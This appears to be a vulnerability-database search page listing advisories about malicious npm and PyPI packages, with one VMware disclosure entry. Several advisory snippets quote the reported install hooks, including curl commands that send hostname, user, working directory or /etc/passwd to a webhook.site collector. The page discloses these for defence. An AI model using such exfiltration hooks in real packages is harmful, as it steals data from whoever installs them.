Lucene search
K

7 matches found

OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/15 8:8 p.m.8 views

Malicious code in dms-backend (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bd479ea3869dae33e183f9164c4e9c7c11a2170728288012647fe2af4d55426e package.json declares a preinstall lifecycle script that runs curl --data-urlencode "info=$hostname && whoami && pwd" against a webhook.site collecto...

5.3AI score
Exploits0References1
OSV
OSV
added 2026/06/15 8:8 p.m.5 views

MAL-2026-5826 Malicious code in dms-backend (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bd479ea3869dae33e183f9164c4e9c7c11a2170728288012647fe2af4d55426e package.json declares a preinstall lifecycle script that runs curl --data-urlencode "info=$hostname && whoami && pwd" against a webhook.site collecto...

5.3AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/15 11:26 a.m.9 views

Malicious code in unico-check (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1945d7aee54e60800e30f150e6db8042fa3aee9ea99f6b5a4ab14e2a1c26571d package.json declares a preinstall lifecycle hook that runs curl against https://webhook.site/fe1246c2-ac04-4493-b223-fe34ba26b79f, passing the...

5.5AI score
Exploits0References1
OSV
OSV
added 2026/06/09 5:18 p.m.10 views

MAL-2026-5409 Malicious code in @easy-entry/outside-registration-fop-navigator (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 04091b4e3c6018586c8ba0c6106ff9177090d0776d1a723d041a76d67b1c8f2b On npm install, package.json's postinstall hook executes node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd'...

5.5AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/26 2:39 p.m.13 views

Malicious code in pywingui (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6db77876bf3b13e55750748761841f7ab77f17bd951bdc1c749e1e56d4416d7e pywingui 6.0.1 advertises itself as a Win32 UI automation framework but ships only Nuitka-compiled cp311-win32.pyd binaries the 4.py files are trivia...

5.8AI score
Exploits0References5
OSV
OSV
added 2026/05/22 2:4 p.m.10 views

MAL-2026-4634 Malicious code in osep-react-antd (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9373e8880ad89854cc168b48a36c59bd72abfaf220e08fb751b948f0c4d8ddfb package.json declares preinstall: node index.js, which runs automatically on npm install. index.js collects host identifiers os.hostname,...

5.9AI score
Exploits0References1
Positive Technologies
Positive Technologies
added 2022/01/10 12:0 a.m.4 views

PT-2022-2186 · Vmware · Vrealize Automation +2

Name of the Vulnerable Software and Affected Versions: VMware Workspace ONE Access affected versions not specified VMware Identity Manager affected versions not specified vRealize Automation affected versions not specified Description: The issue is related to an information disclosure...

5.3CVSS5.9AI score0.00813EPSS
Exploits1References8
Rows per page
Query Builder